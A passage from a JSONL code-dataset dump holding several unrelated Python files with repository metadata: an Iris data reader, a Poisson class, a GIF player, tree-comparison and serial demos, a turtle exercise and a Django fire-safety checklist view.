except ModuleNotFoundError:\n time.sleep(2)\n from matplotlib import pyplot as plt\n\ntry:\n import numpy as np\nexcept ModuleNotFoundError:\n import pip\n pip.main(['install', 'numpy'])\n try:\n import numpy as np\n except ModuleNotFoundError:\n time.sleep(2)\n import numpy as np\n\n\n# 데이터를 떠먹여 줄 클래스를 제작합니다.\nclass DataReader():\n def __init__(self):\n self.label = [\"Iris-setosa\", \"Iris-versicolor\", \"Iris-virginica\"]\n\n self.train_X, self.train_Y, self.test_X, self.test_Y = self.read_data()\n\n # 데이터 읽기가 완료되었습니다.\n # 읽어온 데이터의 정보를 출력합니다.\n print(\"\\n\\nData Read Done!\")\n print(\"Training X Size : \" + str(self.train_X.shape))\n print(\"Training Y Size : \" + str(self.train_Y.shape))\n print(\"Test X Size : \" + str(self.test_X.shape))\n print(\"Test Y Size : \" + str(self.test_Y.shape) + '\\n\\n')\n\n def read_data(self):\n print(\"Reading Data...\")\n file = open(\"data/iris.csv\")\n data = []\n for line in file:\n splt = line.split(\",\")\n if len(splt) != 5:\n break\n feature_1 = float(splt[0].strip())\n feature_2 = float(splt[1].strip())\n feature_3 = float(splt[2].strip())\n feature_4 = float(splt[3].strip())\n label = self.label.index(splt[4].strip())\n data.append(((feature_1, feature_2, feature_3, feature_4), label))\n\n random.shuffle(data)\n\n X = []\n Y = []\n\n for el in data:\n X.append(el[0])\n Y.append(el[1])\n\n X = np.asarray(X)\n Y = np.asarray(Y)\n\n X = X / np.max(X, axis=0)\n\n train_X = X[:int(len(X)*0.8)]\n train_Y = Y[:int(len(Y)*0.8)]\n test_X = X[int(len(X)*0.8):]\n test_Y = Y[int(len(Y)*0.8):]\n\n return train_X, train_Y, test_X, test_Y\n\n\ndef draw_graph(history):\n train_history = history.history[\"loss\"]\n validation_history = history.history[\"val_loss\"]\n fig = plt.figure(figsize=(8, 8))\n plt.title(\"Loss History\")\n plt.xlabel(\"EPOCH\")\n plt.ylabel(\"LOSS Function\")\n plt.plot(train_history, \"red\")\n plt.plot(validation_history, 'blue')\n fig.savefig(\"train_history.png\")\n\n train_history = history.history[\"accuracy\"]\n validation_history = history.history[\"val_accuracy\"]\n fig = plt.figure(figsize=(8, 8))\n plt.title(\"Accuracy History\")\n plt.xlabel(\"EPOCH\")\n plt.ylabel(\"Accuracy\")\n plt.plot(train_history, \"red\")\n plt.plot(validation_history, 'blue')\n fig.savefig(\"accuracy_history.png\")\n","repo_name":"needleworm/bhban_ai","sub_path":"[2편] 인간의 뇌세포를 흉내 낸 인공지능 - FNN/[5장] 분류(Classification) 기법 활용하기/2_5_2_AI는 꽃을 구분할 수 있을까/data_reader.py","file_name":"data_reader.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"74199476967","text":"#!/usr/bin/env python3\n\"\"\"Shebang\"\"\"\n\n\npi = 3.1415926536\ne = 2.7182818285\n\n\nclass Poisson:\n \"\"\"Define a Poisson Class\"\"\"\n def __init__(self, data=None, lambtha=1.):\n if data is None:\n if lambtha <= 0:\n raise ValueError(\"lambtha must be a positive value\")\n self.lambtha = float(lambtha)\n else:\n if not isinstance(data, list):\n raise TypeError(\"data must be a list\")\n if len(data) < 2:\n raise ValueError(\"data must contain multiple values\")\n self.lambtha = sum(data) / len(data)\n\n def pmf(self, k):\n \"\"\"Returns the pmf probability\"\"\"\n k = k if type(k) == int else int(k)\n if k < 0:\n return 0\n k_fact = 1\n for i in range(k):\n k_fact += k_fact * i\n return ((e ** -self.lambtha * self.lambtha ** k) / (k_fact))\n\n def cdf(self, k):\n \"\"\"Returns the cdf\"\"\"\n sum = 0\n k = k if type(k) == int else int(k)\n if k < 0:\n return 0\n for i in range(k + 1):\n sum += self.pmf(i)\n return sum\n","repo_name":"NMenendez24/holbertonschool-machine_learning","sub_path":"math/probability/poisson.py","file_name":"poisson.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21015212062","text":"import PIL.Image as Image\n\n\nclass Gif_Player(object):\n \"\"\" Draw a single gif image \"\"\"\n\n def __init__(self, filename):\n \"\"\" Open filename as the GIF \"\"\"\n\n self.filename = filename\n self.image = None\n self.time_played_ms = 0\n self.timeout_ms = None\n self.eof = True\n self.current_frame = 0\n\n @property\n def is_finished(self):\n \"\"\" We're finished if we're at the eof and we've passed the timeout \"\"\"\n\n if self.timeout_ms is None:\n is_finished = self.eof\n elif self.eof and self.time_played_ms >= self.timeout_ms:\n is_finished = True\n else:\n is_finished = False\n\n return is_finished\n\n def start(self, timeout_ms=None):\n \"\"\" Reset to the beginning \"\"\"\n\n self.timeout_ms = timeout_ms\n self.image = Image.open(self.filename)\n self.time_played_ms = 0\n self.eof = False\n self.current_frame = 0\n\n def draw_frame(self):\n \"\"\" Draw a single frame and return the requested delay \"\"\"\n\n image_copy = self.image.copy()\n\n # Find the encoded duration in milliseconds\n try:\n frame_duration_ms = image_copy.info[\"duration\"]\n except KeyError:\n frame_duration_ms = 25\n\n self.current_frame += 1\n\n # Seek to the current frame, if it exists\n try:\n self.image.seek(self.current_frame)\n except EOFError:\n self.current_frame = 0\n self.image.seek(self.current_frame)\n self.eof = True\n\n self.time_played_ms += frame_duration_ms\n\n return image_copy, frame_duration_ms\n","repo_name":"mattgrogan/ledmatrix","sub_path":"ledmatrix/animation/gif_player.py","file_name":"gif_player.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36235172942","text":"'''\nCompare two trees by visualization and by \nRobinson-Foulds distance\n'''\n\nfrom Bio import Phylo\nimport matplotlib.pyplot as plt\nimport dendropy\nfrom dendropy import Tree\nfrom collections import defaultdict\nimport pandas as pd\n\nnum_seq = [10, 100, 200, 300, 400, 500, 600, 700, 900, 1000]\ntree_dir = \"../processed_data/phylogenetic/runtime_vs_num_seq/\"\ndef draw_tree(tree_fn, out_fn):\n\tplt.close()\n\ttree = Phylo.read(tree_fn, \"newick\")\n\tPhylo.draw(tree)\n\tplt.tight_layout()\n\tplt.savefig(out_fn)\n\tplt.close()\n\ndef run_draw_tree(num_seq):\n\tfor n in num_seq:\n\t\tprint(f\"Number of seq: {n}\")\n\t\tiqtree_fn = f\"{tree_dir}/{n}.np1.treefile\"\n\t\ttreebest_nj_fn = f\"{tree_dir}/{n}.np1.nj.nhx\"\n\n\t\tdraw_tree(iqtree_fn, f\"{tree_dir}/{n}.np1.png\")\n\t\tdraw_tree(treebest_nj_fn, f\"{tree_dir}/{n}.np1.nj.png\")\n\n\ndef get_robinson_foulds_distance(num_seq):\n\tcontainer = defaultdict(list)\n\tfor n in num_seq:\n\t\tiqtree_fn = f\"{tree_dir}/{n}.np1.treefile\"\n\t\ttreebest_nj_fn = f\"{tree_dir}/{n}.np1.nj.nhx\"\n\n\t\tprint(f\"Number of seq: {n}\")\n\t\tiqtree = Tree.get(path=iqtree_fn, schema=\"newick\")\n\t\ttreebest_nj = Tree.get(path=treebest_nj_fn, schema=\"newick\", taxon_namespace=iqtree.taxon_namespace)\n\t\tdist = dendropy.calculate.treecompare.symmetric_difference(iqtree, treebest_nj)\n\t\tcontainer[\"num\"].append(n)\n\t\tcontainer[\"robinson_foulds\"].append(dist)\n\n\trobinson_foulds = pd.DataFrame(container)\n\treturn robinson_foulds\n\n\ndef plot_robinson_foulds_distance(robinson_foulds):\n\tplt.close()\n\tfig, ax = plt.subplots(2,1, figsize=(4,6))\n\tax[0].plot(\"num\", \"robinson_foulds\", \"go\", data=robinson_foulds)\n\tax[0].set_xlabel(\"number of sequence\")\n\tax[0].set_ylabel(\"Robinson-Foulds distance\")\n\n\tax[1].plot(\"num\", \"robinson_foulds\", \"go\", data=robinson_foulds)\n\tax[1].set_xscale(\"log\")\n\tax[1].set_yscale(\"log\")\n\tax[1].set_xlabel(\"log(number of sequence)\")\n\tax[1].set_ylabel(\"Robinson-Foulds distance\")\n\n\tfig.tight_layout()\n\tfig.savefig(f\"{tree_dir}/robinson_foulds_dist.png\")\n\n\nrun_draw_tree(num_seq)\nrobinson_foulds = get_robinson_foulds_distance(num_seq)\nplot_robinson_foulds_distance(robinson_foulds)\n","repo_name":"boxiangliu/covseq","sub_path":"phylogenetic/compare_trees.py","file_name":"compare_trees.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"984796935","text":"import serial\nimport time as time\nfrom multiprocessing import Process\nfrom multiprocessing.sharedctypes import Value\n\n\ndef demo_UART(port_name):\n while True:\n with serial.Serial(port_name, baudrate=115200, timeout=5) as ser:\n line = ser.readline()\n content = line.decode()\n content = content.strip()\n # content = content.split('\\n')[-1:-3:-1]\n # content = [txt.strip() for txt in content]\n if content != \"[INFO: TSCH ] scanning on channel 20\":\n print(\"content = {0}\".format(content))\n # , parity=serial.PARITY_EVEN, rtscts=1\n time.sleep(5)\n\n\ndef async_func(truth):\n print(\"ASYNC function begin\")\n time.sleep(5)\n truth.value = 0\n print(\"ASYNC function done\")\n return\n\ndef demo_multi_prcessing():\n print(\"STARTING DEMO: MULTI_PROCESSING\")\n\n t = Value('i',1,lock=False)\n p = Process(target=async_func, args=(t,))\n count = 0\n p.start()\n while t.value:\n print(\"count = {0}\".format(count))\n count += 1\n time.sleep(1)\n print(\"ENDING DEMO: MULTI_PROCESSING\")\n\n p.join()\n\n\nif __name__ == '__main__':\n port_name = \"/dev/ttyACM0\"\n demo_UART(port_name)\n # demo_multi_prcessing()\n","repo_name":"Project-Repositories/BSC_Proj_IoRT","sub_path":"Robot Controller code/Demos/pyserial_demo.py","file_name":"pyserial_demo.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42774350327","text":"#Exercice 1 :\n\n#----1\nv1 = \"Variable\"\nprint(2, \"Salut\", v1)\n#Pour passer à la ligne, il faut faire un autre appel à la fonction print()\n\n#----2\n#Boucle while:\n#i = 0\n#while (i <= 100):\n# print(i)\n# i = i+1\n\n#Boucle for:\n#for i in range(101):\n# print(i)\n# i = i+1\n\nfrom turtle import *\n\n#Fonction pour créer une figure géométrique\n#Paramètres : figureType = Type de figure géométrique (Carré ou Triangle)\n# tailleArrete = longueur des arrêtes, couleurArrete = couleur des arrêtes,\n#creuxBool = si la figure géométrique est creuse ou non, couleurInterieur = couleur de l'intérieur si la\n#figure géométrique n'est pas creuse\n\ndef creerFigureGeometrique(figureType, tailleArrete, couleurArrete, creuxBool, couleurInterieur):\n color(couleurArrete, couleurInterieur)\n #Si la figure géométrique est non creuse\n if creuxBool == False:\n begin_fill()\n while True:\n forward(tailleArrete)\n if figureType == \"Carré\":\n left(90)\n if figureType == \"Triangle\":\n left(120)\n if abs(pos()) < 1:\n break\n end_fill()\n done()\n #Si la figure géométrique est creuse\n else:\n while True:\n forward(tailleArrete)\n if figureType == \"Carré\":\n left(90)\n if figureType == \"Triangle\":\n left(120)\n if abs(pos()) < 1:\n break\n done()\n \n#creerFigureGeometrique(\"Carré\", 200, \"red\", False, \"Yellow\")\n#creerFigureGeometrique(\"Carré\", 200, \"red\", True, \"\")\n\n#creerFigureGeometrique(\"Triangle\", 200, \"red\", False, \"Yellow\")\n#creerFigureGeometrique(\"Triangle\", 200, \"red\", True, \"\")\n\n\n#----3\nl = [5,9,7,2]\nprint(l)\n\nprint(len(l))\n\nl[2] = 10\nprint(l)\n\ndel l[2]\nprint(l)\n\nl.insert(2,10)\nprint(l)\n\nfor i in l:\n print(i)\n\ni = 0\nwhile i < len(l):\n print(l[i])\n i = i+1\n\n#----4\nimport random\n#Nombre aléatoire entre 3 et 9\nprint(random.randint(3, 9))\nprint(random.randrange(3, 9))\n#Elément aléatoire dans une liste\nl = [\"pomme\", \"banane\", \"cerise\"]\nprint(random.choice(l))\n#Réorganise aléatoirement la liste\nrandom.shuffle(l)\nprint(l)","repo_name":"MadaniBensikhaled/tp_python_1","sub_path":"Exercice1.py","file_name":"Exercice1.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25624287716","text":"from django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\nfrom django.views import View\n\nfrom accounts.mixins.user_type_mixins import IsUserViewMixin\nfrom buildings.constants import LOCATION_CHOICES, CURRENT_CHOICES, FUEL_CHOICES, CONTAINER_LOCATION_CHOICES, \\\n GENERATOR_DISPENSING_CHOICES, GENERATOR_TYPE_CHOICES, SERVICE_SYSTEM_CHOICES, HAZARDOUS_AREA_CHOICES\nfrom business.models import Business\nfrom checklists.constants import REINSPECT, APPROVED, FAILED\nfrom checklists.models import Checklist as Master\nfrom inspections.constants import DONE\nfrom inspections.models import InspectionSchedule\nfrom inspector_dashboards.controllers.views.inspector_dashboards.checklist.forms import ChecklistForm as MasterForm\n\n\"\"\"\nURLS\n# Checklist\n\nfrom inspector_dashboards.controllers.views.inspector_dashboards.checklist import main as checklist_views\n\nurlpatterns += {\n path(\n 'checklist/list',\n checklist_views.InspectorDashboardChecklistListView.as_view(),\n name='inspector_dashboard_checklist_list'\n ),\n path(\n 'checklist//detail',\n checklist_views.InspectorDashboardChecklistDetailView.as_view(),\n name='inspector_dashboard_checklist_detail'\n ),\n path(\n 'checklist/create',\n checklist_views.InspectorDashboardChecklistCreateView.as_view(),\n name='inspector_dashboard_checklist_create'\n ),\n path(\n 'checklist//update',\n checklist_views.InspectorDashboardChecklistUpdateView.as_view(),\n name='inspector_dashboard_checklist_update'\n ),\n path(\n 'checklist//delete',\n checklist_views.InspectorDashboardChecklistDeleteView.as_view(),\n name='inspector_dashboard_checklist_delete'\n )\n}\n\"\"\"\n\n\nclass InspectorDashboardChecklistListView(LoginRequiredMixin, IsUserViewMixin, View):\n \"\"\"\n List view for Checklist.\n\n Allowed HTTP verbs:\n - GET\n\n Restrictions:\n - LoginRequired\n - Admin user\n\n Filters:\n - Optionally used more multi-user/multi-tenant apps to separate ownership\n - ex: company=kwargs.get('company')\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n obj_list = Master.objects.actives()\n paginator = Paginator(obj_list, 1000)\n page = request.GET.get('page')\n objs = paginator.get_page(page)\n\n context = {\n \"page_title\": f\"Checklist\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"list\",\n \"paginator\": paginator,\n \"objects\": objs\n }\n\n return render(request, \"inspector_dashboard/checklist/list.html\", context)\n\n\nclass InspectorDashboardChecklistCreateView(LoginRequiredMixin, IsUserViewMixin, View):\n \"\"\"\n Create view for Checklist.\n\n Allowed HTTP verbs:\n - GET\n - POST\n\n Restrictions:\n - LoginRequired\n - Admin user\n\n Filters:\n - Optionally used more multi-user/multi-tenant apps to separate ownership\n - ex: company=kwargs.get('company')\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n form = MasterForm\n pk = kwargs.get('pk', None)\n inspection_schedule = InspectionSchedule.objects.get(pk=pk)\n business = Business.objects.get(pk=inspection_schedule.business.pk)\n\n location_choices = LOCATION_CHOICES\n current_choices = CURRENT_CHOICES\n fuel_choices = FUEL_CHOICES\n container_location_choices = CONTAINER_LOCATION_CHOICES\n generator_dispensing_choices = GENERATOR_DISPENSING_CHOICES\n generator_type_choices = GENERATOR_TYPE_CHOICES\n service_system_choices = SERVICE_SYSTEM_CHOICES\n hazardous_area_choices = HAZARDOUS_AREA_CHOICES\n\n if 'checklist_formdata' in request.session:\n checklist_formdata = request.session['checklist_formdata']\n del request.session['checklist_formdata']\n else:\n checklist_formdata = {\n 'first_name': '',\n 'middle_name': '',\n 'last_name': '',\n 'policy_no': '',\n 'building_permit': '',\n 'occupancy_permit': '',\n 'fsic_control_no': '',\n 'fsic_fee': '',\n 'fire_drill_certificate': '',\n 'violation_control_no': '',\n 'electrical_inspection_no': '',\n 'sectional_occupancy': '',\n 'exits_count': '',\n 'exits_width': '',\n 'exits_accessible': '',\n 'termination_of_exit': '',\n 'exits_enclosure_provided': '',\n 'exits_enclosure_construction': '',\n 'exits_fire_doors_provided': '',\n 'exits_fire_door_construction': '',\n 'stairs_count': '',\n 'stairs_enclosure_provided': '',\n 'stairs_enclosure_construction': '',\n 'stairs_fire_doors_provided': '',\n 'stairs_fire_door_construction': '',\n 'other_details': '',\n 'emergency_light': '',\n 'exit_signs_illuminated': '',\n 'fire_extinguisher_count': '',\n 'fire_extinguisher_accessible': '',\n 'fire_extinguisher_conspicuous_location': '',\n 'fire_alarm': '',\n 'detectors': '',\n 'control_panel_location': '',\n 'control_panel_functional': '',\n 'hazardous_materials': '',\n 'hazardous_materials_properly_stored': '',\n 'no_smoking_sign': '',\n 'smoking_permitted': '',\n 'smoking_area_location': '',\n 'storage_location': '',\n 'safety_device_for_lpg': '',\n 'oven_used': '',\n 'kind_of_fuel': '',\n 'smoke_hood': '',\n 'spark_arrester': '',\n 'partition_construction': '',\n 'defects': '',\n 'building_permit_date_issued': '',\n 'occupancy_permit_date_issued': '',\n 'fsic_date_issued': '',\n 'fire_drill_certificate_date_issued': '',\n 'violation_control_no_date_issued': '',\n 'electrical_inspection_date_issued': '',\n 'insurance_date_issued': '',\n 'notes': '',\n 'recommendations': '',\n }\n\n context = {\n \"page_title\": \"Create new Checklist\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"create\",\n \"checklist_formdata\": checklist_formdata,\n \"form\": form,\n \"location_choices\": location_choices,\n \"current_choices\": current_choices,\n \"fuel_choices\": fuel_choices,\n \"container_location_choices\": container_location_choices,\n \"generator_dispensing_choices\": generator_dispensing_choices,\n \"generator_type_choices\": generator_type_choices,\n \"service_system_choices\": service_system_choices,\n \"hazardous_area_choices\": hazardous_area_choices,\n \"business\": business,\n \"inspection_schedule\": inspection_schedule,\n }\n\n return render(request, \"inspector_dashboard/checklist/form.html\", context)\n\n def post(self, request, *args, **kwargs):\n form = MasterForm(request.POST, request.FILES)\n pk = kwargs.get('pk', None)\n\n inspection_schedule = InspectionSchedule.objects.get(pk=pk)\n\n checklist_formdata = {\n 'first_name': request.POST.get('first_name', ''),\n 'middle_name': request.POST.get('middle_name', ''),\n 'last_name': request.POST.get('last_name', ''),\n 'policy_no': request.POST.get('policy_no', ''),\n 'building_permit': request.POST.get('building_permit', ''),\n 'occupancy_permit': request.POST.get('occupancy_permit', ''),\n 'fsic_control_no': request.POST.get('fsic_control_no', ''),\n 'fsic_fee': request.POST.get('fsic_fee', ''),\n 'fire_drill_certificate': request.POST.get('fire_drill_certificate', ''),\n 'violation_control_no': request.POST.get('violation_control_no', ''),\n 'electrical_inspection_no': request.POST.get('electrical_inspection_no', ''),\n 'sectional_occupancy': request.POST.get('sectional_occupancy', ''),\n 'exits_count': request.POST.get('exits_count', ''),\n 'exits_width': request.POST.get('exits_width', ''),\n 'exits_accessible': request.POST.get('exits_accessible', ''),\n 'termination_of_exit': request.POST.get('termination_of_exit', ''),\n 'exits_enclosure_provided': request.POST.get('exits_enclosure_provided', ''),\n 'exits_enclosure_construction': request.POST.get('exits_enclosure_construction', ''),\n 'exits_fire_doors_provided': request.POST.get('exits_fire_doors_provided', ''),\n 'exits_fire_door_construction': request.POST.get('exits_fire_door_construction', ''),\n 'stairs_count': request.POST.get('stairs_count', ''),\n 'stairs_enclosure_provided': request.POST.get('stairs_enclosure_provided', ''),\n 'stairs_enclosure_construction': request.POST.get('stairs_enclosure_construction', ''),\n 'stairs_fire_doors_provided': request.POST.get('stairs_fire_doors_provided', ''),\n 'stairs_fire_door_construction': request.POST.get('stairs_fire_door_construction', ''),\n 'other_details': request.POST.get('other_details', ''),\n 'emergency_light': request.POST.get('emergency_light', ''),\n 'exit_signs_illuminated': request.POST.get('exit_signs_illuminated', ''),\n 'fire_extinguisher_count': request.POST.get('fire_extinguisher_count', ''),\n 'fire_extinguisher_accessible': request.POST.get('fire_extinguisher_accessible', ''),\n 'fire_extinguisher_conspicuous_location': request.POST.get('fire_extinguisher_conspicuous_location', ''),\n 'fire_alarm': request.POST.get('fire_alarm', ''),\n 'detectors': request.POST.get('detectors', ''),\n 'control_panel_location': request.POST.get('control_panel_location', ''),\n 'control_panel_functional': request.POST.get('control_panel_functional', ''),\n 'hazardous_materials': request.POST.get('hazardous_materials', ''),\n 'hazardous_materials_properly_stored': request.POST.get('hazardous_materials_properly_stored', ''),\n 'no_smoking_sign': request.POST.get('no_smoking_sign', ''),\n 'smoking_permitted': request.POST.get('smoking_permitted', ''),\n 'smoking_area_location': request.POST.get('smoking_area_location', ''),\n 'storage_location': request.POST.get('storage_location', ''),\n 'safety_device_for_lpg': request.POST.get('safety_device_for_lpg', ''),\n 'oven_used': request.POST.get('oven_used', ''),\n 'kind_of_fuel': request.POST.get('kind_of_fuel', ''),\n 'smoke_hood': request.POST.get('smoke_hood', ''),\n 'spark_arrester': request.POST.get('spark_arrester', ''),\n 'partition_construction': request.POST.get('partition_construction', ''),\n 'defects': request.POST.get('defects', ''),\n 'building_permit_date_issued': request.POST.get('building_permit_date_issued', ''),\n 'occupancy_permit_date_issued': request.POST.get('occupancy_permit_date_issued', ''),\n 'fsic_date_issued': request.POST.get('fsic_date_issued', ''),\n 'fire_drill_certificate_date_issued': request.POST.get('fire_drill_certificate_date_issued', ''),\n 'violation_control_no_date_issued': request.POST.get('violation_control_no_date_issued', ''),\n 'electrical_inspection_date_issued': request.POST.get('electrical_inspection_date_issued', ''),\n 'insurance_date_issued': request.POST.get('insurance_date_issued', ''),\n 'date_checked': request.POST.get('date_checked', ''),\n 'building': request.POST.get('building', ''),\n 'business': request.POST.get('business', ''),\n 'notes': request.POST.get('notes', ''),\n 'recommendations': request.POST.get('recommendations', ''),\n }\n\n if form.is_valid():\n first_name = form.cleaned_data['first_name']\n middle_name = form.cleaned_data['middle_name']\n last_name = form.cleaned_data['last_name']\n policy_no = form.cleaned_data['policy_no']\n building_permit = form.cleaned_data['building_permit']\n occupancy_permit = form.cleaned_data['occupancy_permit']\n fsic_control_no = form.cleaned_data['fsic_control_no']\n fsic_fee = form.cleaned_data['fsic_fee']\n fire_drill_certificate = form.cleaned_data['fire_drill_certificate']\n violation_control_no = form.cleaned_data['violation_control_no']\n electrical_inspection_no = form.cleaned_data['electrical_inspection_no']\n sectional_occupancy = form.cleaned_data['sectional_occupancy']\n exits_count = form.cleaned_data['exits_count']\n exits_width = form.cleaned_data['exits_width']\n exits_accessible = form.cleaned_data['exits_accessible']\n termination_of_exit = form.cleaned_data['termination_of_exit']\n exits_enclosure_provided = form.cleaned_data['exits_enclosure_provided']\n exits_enclosure_construction = form.cleaned_data['exits_enclosure_construction']\n exits_fire_doors_provided = form.cleaned_data['exits_fire_doors_provided']\n exits_fire_door_construction = form.cleaned_data['exits_fire_door_construction']\n stairs_count = form.cleaned_data['stairs_count']\n stairs_enclosure_provided = form.cleaned_data['stairs_enclosure_provided']\n stairs_enclosure_construction = form.cleaned_data['stairs_enclosure_construction']\n stairs_fire_doors_provided = form.cleaned_data['stairs_fire_doors_provided']\n stairs_fire_door_construction = form.cleaned_data['stairs_fire_door_construction']\n other_details = form.cleaned_data['other_details']\n emergency_light = form.cleaned_data['emergency_light']\n exit_signs_illuminated = form.cleaned_data['exit_signs_illuminated']\n fire_extinguisher_count = form.cleaned_data['fire_extinguisher_count']\n fire_extinguisher_accessible = form.cleaned_data['fire_extinguisher_accessible']\n fire_extinguisher_conspicuous_location = form.cleaned_data['fire_extinguisher_conspicuous_location']\n fire_alarm = form.cleaned_data['fire_alarm']\n detectors = form.cleaned_data['detectors']\n control_panel_location = form.cleaned_data['control_panel_location']\n control_panel_functional = form.cleaned_data['control_panel_functional']\n hazardous_materials = form.cleaned_data['hazardous_materials']\n hazardous_materials_properly_stored = form.cleaned_data['hazardous_materials_properly_stored']\n no_smoking_sign = form.cleaned_data['no_smoking_sign']\n smoking_permitted = form.cleaned_data['smoking_permitted']\n smoking_area_location = form.cleaned_data['smoking_area_location']\n storage_location = form.cleaned_data['storage_location']\n safety_device_for_lpg = form.cleaned_data['safety_device_for_lpg']\n oven_used = form.cleaned_data['oven_used']\n kind_of_fuel = form.cleaned_data['kind_of_fuel']\n smoke_hood = form.cleaned_data['smoke_hood']\n spark_arrester = form.cleaned_data['spark_arrester']\n partition_construction = form.cleaned_data['partition_construction']\n defects = form.cleaned_data['defects']\n building_permit_date_issued = form.cleaned_data['building_permit_date_issued']\n occupancy_permit_date_issued = form.cleaned_data['occupancy_permit_date_issued']\n fsic_date_issued = form.cleaned_data['fsic_date_issued']\n fire_drill_certificate_date_issued = form.cleaned_data['fire_drill_certificate_date_issued']\n violation_control_no_date_issued = form.cleaned_data['violation_control_no_date_issued']\n electrical_inspection_date_issued = form.cleaned_data['electrical_inspection_date_issued']\n insurance_date_issued = form.cleaned_data['insurance_date_issued']\n date_checked = form.cleaned_data['date_checked']\n building = form.cleaned_data['building']\n business = form.cleaned_data['business']\n notes = form.cleaned_data['notes']\n recommendations = form.cleaned_data['recommendations']\n\n checklist, checklist_message = Master.objects.create(\n first_name=first_name,\n middle_name=middle_name,\n last_name=last_name,\n policy_no=policy_no,\n building_permit=building_permit,\n occupancy_permit=occupancy_permit,\n fsic_control_no=fsic_control_no,\n fsic_fee=fsic_fee,\n fire_drill_certificate=fire_drill_certificate,\n violation_control_no=violation_control_no,\n electrical_inspection_no=electrical_inspection_no,\n sectional_occupancy=sectional_occupancy,\n exits_count=exits_count,\n exits_width=exits_width,\n exits_accessible=exits_accessible,\n termination_of_exit=termination_of_exit,\n exits_enclosure_provided=exits_enclosure_provided,\n exits_enclosure_construction=exits_enclosure_construction,\n exits_fire_doors_provided=exits_fire_doors_provided,\n exits_fire_door_construction=exits_fire_door_construction,\n stairs_count=stairs_count,\n stairs_enclosure_provided=stairs_enclosure_provided,\n stairs_enclosure_construction=stairs_enclosure_construction,\n stairs_fire_doors_provided=stairs_fire_doors_provided,\n stairs_fire_door_construction=stairs_fire_door_construction,\n other_details=other_details,\n emergency_light=emergency_light,\n exit_signs_illuminated=exit_signs_illuminated,\n fire_extinguisher_count=fire_extinguisher_count,\n fire_extinguisher_accessible=fire_extinguisher_accessible,\n fire_extinguisher_conspicuous_location=fire_extinguisher_conspicuous_location,\n fire_alarm=fire_alarm,\n detectors=detectors,\n control_panel_location=control_panel_location,\n control_panel_functional=control_panel_functional,\n hazardous_materials=hazardous_materials,\n hazardous_materials_properly_stored=hazardous_materials_properly_stored,\n no_smoking_sign=no_smoking_sign,\n smoking_permitted=smoking_permitted,\n smoking_area_location=smoking_area_location,\n storage_location=storage_location,\n safety_device_for_lpg=safety_device_for_lpg,\n oven_used=oven_used,\n kind_of_fuel=kind_of_fuel,\n smoke_hood=smoke_hood,\n spark_arrester=spark_arrester,\n partition_construction=partition_construction,\n defects=defects,\n building_permit_date_issued=building_permit_date_issued,\n occupancy_permit_date_issued=occupancy_permit_date_issued,\n fsic_date_issued=fsic_date_issued,\n fire_drill_certificate_date_issued=fire_drill_certificate_date_issued,\n violation_control_no_date_issued=violation_control_no_date_issued,\n electrical_inspection_date_issued=electrical_inspection_date_issued,\n insurance_date_issued=insurance_date_issued,\n date_checked=date_checked,\n building=building,\n business=business,\n notes=notes,\n recommendations=recommendations,\n )\n\n if checklist:\n result = checklist.result()\n if result:\n checklist.status = APPROVED\n checklist.remarks = APPROVED\n\n checklist.business.status = APPROVED\n checklist.building.status = APPROVED\n\n checklist.business.save()\n checklist.building.save()\n\n checklist.business.is_safe(checklist_pk=checklist.pk)\n\n else:\n checklist.remarks = REINSPECT\n checklist.status = FAILED\n\n checklist.business.status = FAILED\n checklist.building.status = FAILED\n\n checklist.business.save()\n checklist.building.save()\n\n checklist.inspection = inspection_schedule\n checklist.save()\n\n if inspection_schedule.inspection_type == REINSPECT:\n if checklist.remarks == REINSPECT:\n checklist.status = FAILED\n checklist.remarks = REINSPECT\n checklist.save()\n\n inspection_schedule.status = DONE\n inspection_schedule.save()\n\n messages.success(request, 'Checklist recorded!', extra_tags='success')\n return HttpResponseRedirect(\n reverse('inspector_dashboard_checklist_detail', kwargs={'pk': checklist.pk}))\n else:\n messages.error(request, checklist_message, extra_tags='danger')\n else:\n messages.error(request, form.errors, extra_tags='danger')\n request.session['checklist_formdata'] = checklist_formdata\n\n return HttpResponseRedirect(reverse('inspector_dashboard_checklist_create', kwargs={'pk': pk}))\n\n\nclass InspectorDashboardChecklistDetailView(LoginRequiredMixin, IsUserViewMixin, View):\n \"\"\"\n Create view for Checklist.\n\n Allowed HTTP verbs:\n - GET\n\n Restrictions:\n - LoginRequired\n - Admin user\n\n Filters:\n - pk = kwargs.get('pk')\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n obj = get_object_or_404(Master, pk=kwargs.get('pk', None))\n\n context = {\n \"page_title\": f\"Checklist: {obj}\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"detail\",\n \"obj\": obj,\n }\n\n return render(request, \"inspector_dashboard/checklist/detail.html\", context)\n\n\nclass InspectorDashboardChecklistUpdateView(LoginRequiredMixin, IsUserViewMixin, View):\n \"\"\"\n Create view for Checklist.\n\n Allowed HTTP verbs:\n - GET\n - POST\n\n Restrictions:\n - LoginRequired\n - Admin user\n\n Filters:\n - pk = kwargs.get('pk')\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n obj = 